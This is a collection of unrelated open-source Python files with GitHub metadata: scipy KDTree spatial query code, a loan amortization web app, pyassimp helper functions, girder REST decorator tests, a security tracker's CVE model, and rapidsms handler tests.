[5, 10, 11, 15]
Query multiple points and plot the results:
>>> import matplotlib.pyplot as plt
>>> points = np.asarray(points)
>>> plt.plot(points[:,0], points[:,1], '.')
>>> for results in tree.query_ball_point(([2, 0], [3, 3]), 1):
... nearby_points = points[results]
... plt.plot(nearby_points[:,0], nearby_points[:,1], 'o')
>>> plt.margins(0.1, 0.1)
>>> plt.show()
"""
x = np.asarray(x)
if x.shape[-1] != self.m:
raise ValueError("Searching for a %d-dimensional point in a "
"%d-dimensional KDTree" % (x.shape[-1], self.m))
if len(x.shape) == 1:
return self.__query_ball_point(x, r, p, eps)
else:
retshape = x.shape[:-1]
result = np.empty(retshape, dtype=object)
for c in np.ndindex(retshape):
result[c] = self.__query_ball_point(x[c], r, p=p, eps=eps)
return result
def query_ball_tree(self, other, r, p=2., eps=0):
"""Find all pairs of points whose distance is at most r
Parameters
----------
other : KDTree instance
The tree containing points to search against.
r : float
The maximum distance, has to be positive.
p : float, optional
Which Minkowski norm to use. `p` has to meet the condition
``1 <= p <= infinity``.
eps : float, optional
Approximate search. Branches of the tree are not explored
if their nearest points are further than ``r/(1+eps)``, and
branches are added in bulk if their furthest points are nearer
than ``r * (1+eps)``. `eps` has to be non-negative.
Returns
-------
results : list of lists
For each element ``self.data[i]`` of this tree, ``results[i]`` is a
list of the indices of its neighbors in ``other.data``.
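        Examples
        --------
        A small illustrative sketch; the exact index lists depend on the
        points used:
        >>> from scipy import spatial
        >>> tree1 = spatial.KDTree([[0, 0], [0, 1], [1, 0]])
        >>> tree2 = spatial.KDTree([[0, 0.1], [2, 2]])
        >>> neighbors = tree1.query_ball_tree(tree2, r=0.5)
        >>> # neighbors[i] lists the indices in tree2 within r of tree1's point i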
"""
results = [[] for i in range(self.n)]
def traverse_checking(node1, rect1, node2, rect2):
if rect1.min_distance_rectangle(rect2, p) > r/(1.+eps):
return
elif rect1.max_distance_rectangle(rect2, p) < r*(1.+eps):
traverse_no_checking(node1, node2)
elif isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
d = other.data[node2.idx]
for i in node1.idx:
results[i] += node2.idx[minkowski_distance(d,self.data[i],p) <= r].tolist()
else:
less, greater = rect2.split(node2.split_dim, node2.split)
traverse_checking(node1,rect1,node2.less,less)
traverse_checking(node1,rect1,node2.greater,greater)
elif isinstance(node2, KDTree.leafnode):
less, greater = rect1.split(node1.split_dim, node1.split)
traverse_checking(node1.less,less,node2,rect2)
traverse_checking(node1.greater,greater,node2,rect2)
else:
less1, greater1 = rect1.split(node1.split_dim, node1.split)
less2, greater2 = rect2.split(node2.split_dim, node2.split)
traverse_checking(node1.less,less1,node2.less,less2)
traverse_checking(node1.less,less1,node2.greater,greater2)
traverse_checking(node1.greater,greater1,node2.less,less2)
traverse_checking(node1.greater,greater1,node2.greater,greater2)
def traverse_no_checking(node1, node2):
if isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
for i in node1.idx:
results[i] += node2.idx.tolist()
else:
traverse_no_checking(node1, node2.less)
traverse_no_checking(node1, node2.greater)
else:
traverse_no_checking(node1.less, node2)
traverse_no_checking(node1.greater, node2)
traverse_checking(self.tree, Rectangle(self.maxes, self.mins),
other.tree, Rectangle(other.maxes, other.mins))
return results
def query_pairs(self, r, p=2., eps=0):
"""
Find all pairs of points within a distance.
Parameters
----------
r : positive float
The maximum distance.
p : float, optional
Which Minkowski norm to use. `p` has to meet the condition
``1 <= p <= infinity``.
eps : float, optional
Approximate search. Branches of the tree are not explored
if their nearest points are further than ``r/(1+eps)``, and
branches are added in bulk if their furthest points are nearer
than ``r * (1+eps)``. `eps` has to be non-negative.
Returns
-------
results : set
Set of pairs ``(i,j)``, with ``i < j``, for which the corresponding
positions are close.
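        Examples
        --------
        A small illustrative sketch:
        >>> from scipy import spatial
        >>> tree = spatial.KDTree([[0, 0], [0, 0.5], [3, 3]])
        >>> pairs = tree.query_pairs(r=1.0)  # {(0, 1)} for these points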
"""
results = set()
def traverse_checking(node1, rect1, node2, rect2):
if rect1.min_distance_rectangle(rect2, p) > r/(1.+eps):
return
elif rect1.max_distance_rectangle(rect2, p) < r*(1.+eps):
traverse_no_checking(node1, node2)
elif isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
# Special care to avoid duplicate pairs
if id(node1) == id(node2):
d = self.data[node2.idx]
for i in node1.idx:
for j in node2.idx[minkowski_distance(d,self.data[i],p) <= r]:
if i < j:
results.add((i,j))
else:
d = self.data[node2.idx]
for i in node1.idx:
for j in node2.idx[minkowski_distance(d,self.data[i],p) <= r]:
if i < j:
results.add((i,j))
elif j < i:
results.add((j,i))
else:
less, greater = rect2.split(node2.split_dim, node2.split)
traverse_checking(node1,rect1,node2.less,less)
traverse_checking(node1,rect1,node2.greater,greater)
elif isinstance(node2, KDTree.leafnode):
less, greater = rect1.split(node1.split_dim, node1.split)
traverse_checking(node1.less,less,node2,rect2)
traverse_checking(node1.greater,greater,node2,rect2)
else:
less1, greater1 = rect1.split(node1.split_dim, node1.split)
less2, greater2 = rect2.split(node2.split_dim, node2.split)
traverse_checking(node1.less,less1,node2.less,less2)
traverse_checking(node1.less,less1,node2.greater,greater2)
# Avoid traversing (node1.less, node2.greater) and
# (node1.greater, node2.less) (it's the same node pair twice
# over, which is the source of the complication in the
# original KDTree.query_pairs)
if id(node1) != id(node2):
traverse_checking(node1.greater,greater1,node2.less,less2)
traverse_checking(node1.greater,greater1,node2.greater,greater2)
def traverse_no_checking(node1, node2):
if isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
# Special care to avoid duplicate pairs
if id(node1) == id(node2):
for i in node1.idx:
for j in node2.idx:
if i < j:
results.add((i,j))
else:
for i in node1.idx:
for j in node2.idx:
if i < j:
results.add((i,j))
elif j < i:
results.add((j,i))
else:
traverse_no_checking(node1, node2.less)
traverse_no_checking(node1, node2.greater)
else:
# Avoid traversing (node1.less, node2.greater) and
# (node1.greater, node2.less) (it's the same node pair twice
# over, which is the source of the complication in the
# original KDTree.query_pairs)
if id(node1) == id(node2):
traverse_no_checking(node1.less, node2.less)
traverse_no_checking(node1.less, node2.greater)
traverse_no_checking(node1.greater, node2.greater)
else:
traverse_no_checking(node1.less, node2)
traverse_no_checking(node1.greater, node2)
traverse_checking(self.tree, Rectangle(self.maxes, self.mins),
self.tree, Rectangle(self.maxes, self.mins))
return results
def count_neighbors(self, other, r, p=2.):
"""
Count how many nearby pairs can be formed.
Count the number of pairs (x1,x2) can be formed, with x1 drawn
from self and x2 drawn from ``other``, and where
``distance(x1, x2, p) <= r``.
This is the "two-point correlation" described in Gray and Moore 2000,
"N-body problems in statistical learning", and the code here is based
on their algorithm.
Parameters
----------
other : KDTree instance
The other tree to draw points from.
r : float or one-dimensional array of floats
The radius to produce a count for. Multiple radii are searched with
a single tree traversal.
p : float, 1<=p<=infinity, optional
Which Minkowski p-norm to use
Returns
-------
result : int or 1-D array of ints
The number of pairs. Note that this is internally stored in a numpy
int, and so may overflow if very large (2e9).
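        Examples
        --------
        A small illustrative sketch counting pairs for two radii in a single
        traversal:
        >>> from scipy import spatial
        >>> tree1 = spatial.KDTree([[0, 0], [1, 1]])
        >>> tree2 = spatial.KDTree([[0, 0.5], [2, 2]])
        >>> counts = tree1.count_neighbors(tree2, r=[0.6, 3.0])
        >>> # counts[i] is the number of (x1, x2) pairs with distance <= r[i]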
"""
def traverse(node1, rect1, node2, rect2, idx):
min_r = rect1.min_distance_rectangle(rect2,p)
max_r = rect1.max_distance_rectangle(rect2,p)
c_greater = r[idx] > max_r
result[idx[c_greater]] += node1.children*node2.children
idx = idx[(min_r <= r[idx]) & (r[idx] <= max_r)]
if len(idx) == 0:
return
if isinstance(node1,KDTree.leafnode):
if isinstance(node2,KDTree.leafnode):
ds = minkowski_distance(self.data[node1.idx][:,np.newaxis,:],
other.data[node2.idx][np.newaxis,:,:],
p).ravel()
ds.sort()
result[idx] += np.searchsorted(ds,r[idx],side='right')
else:
less, greater = rect2.split(node2.split_dim, node2.split)
traverse(node1, rect1, node2.less, less, idx)
traverse(node1, rect1, node2.greater, greater, idx)
else:
if isinstance(node2,KDTree.leafnode):
less, greater = rect1.split(node1.split_dim, node1.split)
traverse(node1.less, less, node2, rect2, idx)
traverse(node1.greater, greater, node2, rect2, idx)
else:
less1, greater1 = rect1.split(node1.split_dim, node1.split)
less2, greater2 = rect2.split(node2.split_dim, node2.split)
traverse(node1.less,less1,node2.less,less2,idx)
traverse(node1.less,less1,node2.greater,greater2,idx)
traverse(node1.greater,greater1,node2.less,less2,idx)
traverse(node1.greater,greater1,node2.greater,greater2,idx)
R1 = Rectangle(self.maxes, self.mins)
R2 = Rectangle(other.maxes, other.mins)
if np.shape(r) == ():
r = np.array([r])
result = np.zeros(1,dtype=int)
traverse(self.tree, R1, other.tree, R2, np.arange(1))
return result[0]
elif len(np.shape(r)) == 1:
r = np.asarray(r)
n, = r.shape
result = np.zeros(n,dtype=int)
traverse(self.tree, R1, other.tree, R2, np.arange(n))
return result
else:
raise ValueError("r must be either a single value or a one-dimensional array of values")
def sparse_distance_matrix(self, other, max_distance, p=2.):
"""
Compute a sparse distance matrix
Computes a distance matrix between two KDTrees, leaving as zero
any distance greater than max_distance.
Parameters
----------
other : KDTree
max_distance : positive float
p : float, optional
Returns
-------
result : dok_matrix
Sparse matrix representing the results in "dictionary of keys" format.
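        Examples
        --------
        A small illustrative sketch; distances beyond ``max_distance`` are
        simply left as zero entries:
        >>> from scipy import spatial
        >>> tree1 = spatial.KDTree([[0, 0], [1, 1]])
        >>> tree2 = spatial.KDTree([[0, 0.2], [5, 5]])
        >>> sdm = tree1.sparse_distance_matrix(tree2, max_distance=1.0)
        >>> # sdm is a scipy.sparse.dok_matrix with one nonzero entry here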
"""
result = scipy.sparse.dok_matrix((self.n,other.n))
def traverse(node1, rect1, node2, rect2):
if rect1.min_distance_rectangle(rect2, p) > max_distance:
return
elif isinstance(node1, KDTree.leafnode):
if isinstance(node2, KDTree.leafnode):
for i in node1.idx:
for j in node2.idx:
d = minkowski_distance(self.data[i],other.data[j],p)
if d <= max_distance:
result[i,j] = d
else:
less, greater = rect2.split(node2.split_dim, node2.split)
traverse(node1,rect1,node2.less,less)
traverse(node1,rect1,node2.greater,greater)
elif isinstance(node2, KDTree.leafnode):
less, greater = rect1.split(node1.split_dim, node1.split)
traverse(node1.less,less,node2,rect2)
traverse(node1.greater,greater,node2,rect2)
else:
less1, greater1 = rect1.split(node1.split_dim, node1.split)
less2, greater2 = rect2.split(node2.split_dim, node2.split)
traverse(node1.less,less1,node2.less,less2)
traverse(node1.less,less1,node2.greater,greater2)
traverse(node1.greater,greater1,node2.less,less2)
traverse(node1.greater,greater1,node2.greater,greater2)
traverse(self.tree, Rectangle(self.maxes, self.mins),
other.tree, Rectangle(other.maxes, other.mins))
return result
def distance_matrix(x, y, p=2, threshold=1000000):
"""
Compute the distance matrix.
Returns the matrix of all pair-wise distances.
Parameters
----------
x : (M, K) array_like
Matrix of M vectors in K dimensions.
y : (N, K) array_like
Matrix of N vectors in K dimensions.
p : float, 1 <= p <= infinity
Which Minkowski p-norm to use.
threshold : positive int
If ``M * N * K`` > `threshold`, algorithm uses a Python loop instead
of large temporary arrays.
Returns
-------
result : (M, N) ndarray
Matrix containing the distance from every vector in `x` to every vector
in `y`.
Examples
--------
>>> from scipy.spatial import distance_matrix
>>> distance_matrix([[0,0],[0,1]], [[1,0],[1,1]])
array([[ 1. , 1.41421356],
[ 1.41421356, 1. ]])
"""
x = np.asarray(x)
m, k = x.shape
y = np.asarray(y)
n, kk = y.shape
if k != kk:
raise ValueError("x contains %d-dimensional vectors but y contains %d-dimensional vectors" % (k, kk))
if m*n*k <= threshold:
return minkowski_distance(x[:,np.newaxis,:],y[np.newaxis,:,:],p)
else:
result = np.empty((m,n),dtype=float) # FIXME: figure out the best dtype
if m < n:
for i in range(m):
result[i,:] = minkowski_distance(x[i],y,p)
else:
for j in range(n):
result[:,j] = minkowski_distance(x,y[j],p)
return result
| {
"content_hash": "97379c164c244fb6a2d145ef7432eeae",
"timestamp": "",
"source": "github",
"line_count": 994,
"max_line_length": 137,
"avg_line_length": 38.627766599597585,
"alnum_prop": 0.5262787790394833,
"repo_name": "jor-/scipy",
"id": "239438686bdc20778e9811db48cdb8ada57652b6",
"size": "38466",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "scipy/spatial/kdtree.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4395724"
},
{
"name": "C++",
"bytes": "649714"
},
{
"name": "Dockerfile",
"bytes": "1236"
},
{
"name": "Fortran",
"bytes": "5367732"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12479679"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
} |
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'libs'))
import logging
import datetime
import json
from functools import partial
from operator import itemgetter
from decimal import Decimal as D, InvalidOperation
from collections import defaultdict, namedtuple
import jinja2
import webapp2
from wtforms import Form, DecimalField, IntegerField, RadioField, DateField
from wtforms.validators import InputRequired, Optional
Installment = namedtuple('Installment', (
'year',
'month',
'original_balance',
'principal',
'interest',
'monthly_installment',
'current_balance',
)
)
tojson = partial(json.dumps, default=lambda obj: '{:.2f}'.format(obj) if isinstance(obj, D) else obj)
currency_format = lambda val: '{:,.2f}'.format(val) if isinstance(val, (float, D)) else val
TEMPLATE_DIR = os.path.join(os.path.dirname(__file__), 'templates')
JINJA_ENV = jinja2.Environment(loader=jinja2.FileSystemLoader(TEMPLATE_DIR),
extensions=['jinja2.ext.autoescape'], autoescape=True)
JINJA_ENV.filters['tojson'] = tojson
JINJA_ENV.filters['currency_format'] = currency_format
YEARS = 'Y'
MONTHS = 'M'
PERIOD_TYPE_CHOICES = [
(YEARS, 'Years'),
(MONTHS, 'Months'),
]
class ScheduleForm(Form):
amount = DecimalField('Loan Amount:',
[InputRequired()],
default=D(500000),
)
interest_rate = DecimalField('Interest Rate:',
[InputRequired()],
default=D('12.5'),
)
period = IntegerField('Loan Period:',
[InputRequired()],
default=5,
)
period_type = RadioField('Period Type',
[InputRequired()],
choices=PERIOD_TYPE_CHOICES,
default=YEARS,
)
start_date = DateField('Start Date:',
[Optional()],
default=datetime.date.today,
format='%d/%m/%Y',
)
def render_template(template_name, **ctx):
template = JINJA_ENV.get_template(template_name)
return template.render(ctx)
def next_month(year, month):
if month == 12:
nmonth = 1
nyear = year + 1
else:
nmonth = month + 1
nyear = year
return nyear, nmonth
def generate_schedule(amount, interest_rate, period, period_type='Y', start_date=None):
_loan_paid_indicator = D('0.00')
n = period
if period_type == 'Y':
n = period * 12
mir = (interest_rate / 100) / 12
discount_factor = (((1 + mir) ** n) - 1) / (mir * (1 + mir) ** n)
monthly_installment = amount / discount_factor
if start_date is None:
start_date = datetime.date.today()
installments = []
current_balance = original_balance = amount
year = start_date.year
month = start_date.month
while current_balance >= _loan_paid_indicator:
interest = current_balance * mir
principal = monthly_installment - interest
original_balance = current_balance
current_balance -= principal
month_name = datetime.date(year, month, 1).strftime('%B')
installment = Installment(year, month_name, original_balance, principal, interest, monthly_installment, current_balance)
installments.append(installment)
year, month = next_month(year, month)
return installments
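# Illustrative usage sketch (not wired into the request flow): build a
# 5-year schedule at 12.5% for a 500,000 loan and total the interest paid.
def _example_schedule():
    schedule = generate_schedule(D(500000), D('12.5'), 5, period_type=YEARS)
    total_interest = sum(inst.interest for inst in schedule)
    return schedule, total_interest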
class MainHandler(webapp2.RequestHandler):
def get(self):
loan = {}
schedule = []
total_interest = None
form = ScheduleForm(self.request.GET)
if self.request.GET and form.validate():
amount = form.amount.data
interest_rate = form.interest_rate.data
period = form.period.data
period_type = form.period_type.data
start_date = form.start_date.data or datetime.date.today()
loan = form.data.copy()
if not form.start_date.data:
loan['start_date'] = start_date
logging.info('Amount: {0:,.2f}\tInterest Rate: {1:,.2f}\tPeriod: '
'{2}\tPeriod Type: {3}\tStart Date: {4}'.format(amount,
interest_rate, period, period_type, start_date))
schedule = generate_schedule(amount, interest_rate, period, period_type, start_date)
total_interest = sum(map(itemgetter(4), schedule))
self.response.write(render_template('index.html',
form=form,
loan=loan,
schedule=schedule,
total_interest=total_interest,
)
)
app = webapp2.WSGIApplication([
('/', MainHandler),
], debug=True)
| {
"content_hash": "a2f378410302d9b2e43f2b5028e5dd11",
"timestamp": "",
"source": "github",
"line_count": 153,
"max_line_length": 128,
"avg_line_length": 30.11764705882353,
"alnum_prop": 0.6078559027777778,
"repo_name": "gledi/amortsched",
"id": "7a070016c5520bef3b08d1a392437f654be24012",
"size": "4630",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "main.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "19494"
},
{
"name": "HTML",
"bytes": "6432"
},
{
"name": "JavaScript",
"bytes": "32518"
},
{
"name": "Python",
"bytes": "184762"
}
],
"symlink_target": ""
} |
"""
Some fancy helper functions.
"""
import os
import ctypes
from ctypes import POINTER
import operator
import numpy
from numpy import linalg
import logging
logger = logging.getLogger("pyassimp")
from .errors import AssimpError
additional_dirs, ext_whitelist = [],[]
# populate search directories and lists of allowed file extensions
# depending on the platform we're running on.
if os.name=='posix':
additional_dirs.append('/usr/lib/')
additional_dirs.append('/usr/local/lib/')
# note - this won't catch libassimp.so.N.n, but
# currently there's always a symlink called
# libassimp.so in /usr/local/lib.
ext_whitelist.append('.so')
elif os.name=='nt':
ext_whitelist.append('.dll')
path_dirs = os.environ['PATH'].split(';')
for dir_candidate in path_dirs:
if 'assimp' in dir_candidate.lower():
additional_dirs.append(dir_candidate)
#print(additional_dirs)
def vec2tuple(x):
""" Converts a VECTOR3D to a Tuple """
return (x.x, x.y, x.z)
def transform(vector3, matrix4x4):
""" Apply a transformation matrix on a 3D vector.
:param vector3: a numpy array with 3 elements
:param matrix4x4: a numpy 4x4 matrix
"""
return numpy.dot(matrix4x4, numpy.append(vector3, 1.))
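# Illustrative sketch (not called anywhere in this module): applying a
# homogeneous 4x4 translation to a 3D point; note the result keeps the
# homogeneous component, so it has 4 elements.
def _example_transform():
    translation = numpy.array([[1., 0., 0., 10.],
                               [0., 1., 0., 0.],
                               [0., 0., 1., 0.],
                               [0., 0., 0., 1.]])
    return transform(numpy.array([1., 2., 3.]), translation)  # [11., 2., 3., 1.]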
def get_bounding_box(scene):
bb_min = [1e10, 1e10, 1e10] # x,y,z
bb_max = [-1e10, -1e10, -1e10] # x,y,z
return get_bounding_box_for_node(scene.rootnode, bb_min, bb_max, linalg.inv(scene.rootnode.transformation))
def get_bounding_box_for_node(node, bb_min, bb_max, transformation):
transformation = numpy.dot(transformation, node.transformation)
for mesh in node.meshes:
for v in mesh.vertices:
v = transform(v, transformation)
bb_min[0] = min(bb_min[0], v[0])
bb_min[1] = min(bb_min[1], v[1])
bb_min[2] = min(bb_min[2], v[2])
bb_max[0] = max(bb_max[0], v[0])
bb_max[1] = max(bb_max[1], v[1])
bb_max[2] = max(bb_max[2], v[2])
for child in node.children:
bb_min, bb_max = get_bounding_box_for_node(child, bb_min, bb_max, transformation)
return bb_min, bb_max
def try_load_functions(library,dll,candidates):
"""try to functbind to aiImportFile and aiReleaseImport
library - path to current lib
dll - ctypes handle to it
candidates - receives matching candidates
They serve as signal functions to detect assimp,
also they're currently the only functions we need.
insert (library,aiImportFile,aiReleaseImport,dll)
into 'candidates' if successful.
"""
try:
load = dll.aiImportFile
release = dll.aiReleaseImport
except AttributeError:
#OK, this is a library, but it has not the functions we need
pass
else:
#Library found!
from .structs import Scene
load.restype = POINTER(Scene)
candidates.append((library, load, release, dll))
def search_library():
"""Loads the assimp-Library.
result (load-function, release-function)
exception AssimpError if no library is found
"""
#this path
folder = os.path.dirname(__file__)
# silence 'DLL not found' message boxes on win
try:
ctypes.windll.kernel32.SetErrorMode(0x8007)
except AttributeError:
pass
candidates = []
# test every file
for curfolder in [folder]+additional_dirs:
for filename in os.listdir(curfolder):
# our minimum requirement for candidates is that
# they should contain 'assimp' somewhere in
# their name
if filename.lower().find('assimp')==-1 or\
os.path.splitext(filename)[-1].lower() not in ext_whitelist:
continue
library = os.path.join(curfolder, filename)
logger.debug('Try ' + library)
try:
dll = ctypes.cdll.LoadLibrary(library)
except Exception as e:
logger.warning(str(e))
# OK, this except is evil. But different OSs will throw different
# errors. So just ignore any errors.
continue
try_load_functions(library,dll,candidates)
if not candidates:
# no library found
raise AssimpError("assimp library not found")
else:
# get the newest library
candidates = map(lambda x: (os.lstat(x[0])[-2], x), candidates)
res = max(candidates, key=operator.itemgetter(0))[1]
logger.debug('Using assimp library located at ' + res[0])
# XXX: if there are 1000 dll/so files containing 'assimp'
# in their name, do we have all of them in our address
# space now until gc kicks in?
# XXX: take version postfix of the .so on linux?
return res[1:]
def hasattr_silent(object, name):
"""
    Calls hasattr() with the given parameters and preserves the legacy (pre-Python 3.2)
    functionality of silently catching exceptions.
    Returns the result of hasattr() or False if an exception was raised.
"""
try:
return hasattr(object, name)
except:
return False
| {
"content_hash": "7d8f27a979955fe4688c2c08aa62b011",
"timestamp": "",
"source": "github",
"line_count": 170,
"max_line_length": 111,
"avg_line_length": 30.729411764705883,
"alnum_prop": 0.6196401225114855,
"repo_name": "ivansoban/ILEngine",
"id": "4e9f8ec69d909f115702da7ea86bebcf78a00cd6",
"size": "5248",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "thirdparty/assimp/port/PyAssimp/pyassimp/helper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "516"
},
{
"name": "C++",
"bytes": "37989"
}
],
"symlink_target": ""
} |
import json
import os
from .. import base
from girder.api.rest import endpoint
from girder.utility import config
def setUpModule():
pluginRoot = os.path.join(os.path.dirname(os.path.dirname(__file__)),
'test_plugins')
conf = config.getConfig()
conf['plugins'] = {'plugin_directory': pluginRoot}
base.enabledPlugins = ['test_plugin']
base.startServer()
def tearDownModule():
base.stopServer()
class TestEndpointDecoratorException(base.TestCase):
"""Tests the endpoint decorator exception handling."""
@endpoint
def pointlessEndpointAscii(self, path, params):
raise Exception('You did something wrong.')
@endpoint
def pointlessEndpointUnicode(self, path, params):
raise Exception(u'\u0400 cannot be converted to ascii.')
@endpoint
def pointlessEndpointBytes(self, path, params):
raise Exception('\x80\x80 cannot be converted to unicode or ascii.')
def testEndpointExceptionAscii(self):
resp = self.pointlessEndpointAscii('', {}).decode()
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testEndpointExceptionUnicode(self):
resp = self.pointlessEndpointUnicode('', {}).decode('utf8')
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testEndpointExceptionBytes(self):
resp = self.pointlessEndpointBytes('', {}).decode('utf8')
obj = json.loads(resp)
self.assertEqual(obj['type'], 'internal')
def testBoundHandlerDecorator(self):
resp = self.request('/collection/unbound/default', params={
'val': False
})
self.assertStatusOk(resp)
self.assertEqual(resp.json, True)
resp = self.request('/collection/unbound/explicit')
self.assertStatusOk(resp)
self.assertEqual(resp.json, {
'name': 'collection',
'user': None
})
def testRawResponse(self):
resp = self.request('/other/rawWithDecorator', isJson=False)
self.assertStatusOk(resp)
self.assertEqual(self.getBody(resp), 'this is a raw response')
resp = self.request('/other/rawInternal', isJson=False)
self.assertStatusOk(resp)
self.assertEqual(self.getBody(resp), 'this is also a raw response')
| {
"content_hash": "6d296e3dcc1fbd49161915c3e1f106a4",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 76,
"avg_line_length": 31.58108108108108,
"alnum_prop": 0.6469833119383825,
"repo_name": "msmolens/girder",
"id": "78fcd6d0585ee7103297f822d1418179ae0803b3",
"size": "3126",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/cases/rest_decorator_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CMake",
"bytes": "51477"
},
{
"name": "CSS",
"bytes": "42637"
},
{
"name": "HTML",
"bytes": "106882"
},
{
"name": "JavaScript",
"bytes": "955299"
},
{
"name": "Mako",
"bytes": "5674"
},
{
"name": "Python",
"bytes": "1416993"
},
{
"name": "Ruby",
"bytes": "12419"
},
{
"name": "Shell",
"bytes": "9961"
}
],
"symlink_target": ""
} |
from datetime import datetime
from tracker import db
from tracker.util import issue_to_numeric
from .enum import Remote
from .enum import Severity
cve_id_regex = r'^(CVE\-\d{4}\-\d{4,})$'
issue_types = [
'unknown',
'access restriction bypass',
'arbitrary code execution',
'arbitrary command execution',
'arbitrary file overwrite',
'arbitrary filesystem access',
'arbitrary file upload',
'authentication bypass',
'certificate verification bypass',
'content spoofing',
'cross-site request forgery',
'cross-site scripting',
'denial of service',
'directory traversal',
'incorrect calculation',
'information disclosure',
'insufficient validation',
'man-in-the-middle',
'open redirect',
'private key recovery',
'privilege escalation',
'proxy injection',
'same-origin policy bypass',
'sandbox escape',
'session hijacking',
'signature forgery',
'silent downgrade',
'sql injection',
'time alteration',
'url request injection',
'xml external entity injection'
]
class CVE(db.Model):
DESCRIPTION_LENGTH = 4096
REFERENCES_LENGTH = 4096
NOTES_LENGTH = 4096
__versioned__ = {}
__tablename__ = 'cve'
id = db.Column(db.String(15), index=True, unique=True, primary_key=True)
issue_type = db.Column(db.String(64), default='unknown')
description = db.Column(db.String(DESCRIPTION_LENGTH))
severity = db.Column(Severity.as_type(), nullable=False, default=Severity.unknown)
remote = db.Column(Remote.as_type(), nullable=False, default=Remote.unknown)
reference = db.Column(db.String(REFERENCES_LENGTH))
notes = db.Column(db.String(NOTES_LENGTH))
created = db.Column(db.DateTime, default=datetime.utcnow, nullable=False, index=True)
changed = db.Column(db.DateTime, default=datetime.utcnow, nullable=False, index=True)
@staticmethod
def new(id):
return CVE(id=id,
issue_type='unknown',
description='',
severity=Severity.unknown,
remote=Remote.unknown,
reference='',
notes='')
def __repr__(self):
return '{}'.format(self.id)
@property
def numerical_repr(self):
return issue_to_numeric(self.id)
def __gt__(self, other):
return self.numerical_repr > other.numerical_repr
def __lt__(self, other):
return self.numerical_repr < other.numerical_repr
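# Illustrative sketch (not used by the tracker itself): the comparison
# operators above let CVE objects be sorted by their numeric identifier,
# assuming issue_to_numeric orders ids by year and number as its name suggests.
def _example_ordering():
    older = CVE.new('CVE-2016-0002')
    newer = CVE.new('CVE-2016-0010')
    return sorted([newer, older])  # expected: [older, newer]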
| {
"content_hash": "64dd8a937f911aae8a88ecf6b651283e",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 89,
"avg_line_length": 29.36470588235294,
"alnum_prop": 0.6394230769230769,
"repo_name": "jelly/arch-security-tracker",
"id": "0adcdbed434ec385adc7940709d7330d60c2e821",
"size": "2496",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "tracker/model/cve.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9806"
},
{
"name": "HTML",
"bytes": "65601"
},
{
"name": "Makefile",
"bytes": "1441"
},
{
"name": "Mako",
"bytes": "494"
},
{
"name": "Python",
"bytes": "345600"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from django.test.utils import override_settings
from rapidsms.contrib.echo.handlers.echo import EchoHandler
from rapidsms.contrib.echo.handlers.ping import PingHandler
from rapidsms.contrib.handlers.utils import get_handlers
import mock
__all__ = ['TestGetHandlers']
class TestGetHandlers(TestCase):
DEFAULT_APP = 'rapidsms.contrib.default' # Defines no handlers
ECHO_APP = 'rapidsms.contrib.echo' # Defines exactly 2 handlers
ECHO_HANDLER = 'rapidsms.contrib.echo.handlers.echo'
PING_HANDLER = 'rapidsms.contrib.echo.handlers.ping'
ECHO_HANDLER_CLASS = 'rapidsms.contrib.echo.handlers.echo.EchoHandler'
PING_HANDLER_CLASS = 'rapidsms.contrib.echo.handlers.ping.PingHandler'
def setUp(self):
# Used with override_settings, so that we test in a predictable
# environment.
self.settings = {
'INSTALLED_APPS': [],
'INSTALLED_HANDLERS': None,
'EXCLUDED_HANDLERS': [],
'RAPIDSMS_HANDLERS_EXCLUDE_APPS': [],
}
def _check_get_handlers(self, *args):
with override_settings(**self.settings):
with mock.patch('rapidsms.contrib.handlers.utils.warn') as warn:
handlers = get_handlers()
self.assertEqual(set(handlers), set(args))
# If RAPIDSMS_HANDLERS is not defined, a deprecation warning is issued
self.assertEqual(warn.called, 'RAPIDSMS_HANDLERS' not in self.settings)
def test_no_installed_apps(self):
"""App should not load any handlers if there are no installed apps."""
self._check_get_handlers()
def test_no_relevant_installed_apps(self):
"""App should not load any handlers if no app contains handlers."""
self.settings['INSTALLED_APPS'] = [self.DEFAULT_APP]
self._check_get_handlers()
def test_installed_apps(self):
"""App should load handlers from any app in INSTALLED_APPS."""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self._check_get_handlers(EchoHandler, PingHandler)
def test_installed_handler__installed_apps(self):
"""
App should only include handlers listed in INSTALLED_HANDLERS, if it
is defined.
"""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['INSTALLED_HANDLERS'] = [self.PING_HANDLER]
self._check_get_handlers(PingHandler)
def test_installed_handlers__installed_apps(self):
"""
        App should only include handlers listed in INSTALLED_HANDLERS, if it
is defined.
"""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['INSTALLED_HANDLERS'] = [self.PING_HANDLER,
self.ECHO_HANDLER]
self._check_get_handlers(PingHandler, EchoHandler)
def test_installed_handlers__no_installed_apps(self):
"""App should handle when an INSTALLED_HANDLER can't be found."""
self.settings['INSTALLED_HANDLERS'] = [self.PING_HANDLER]
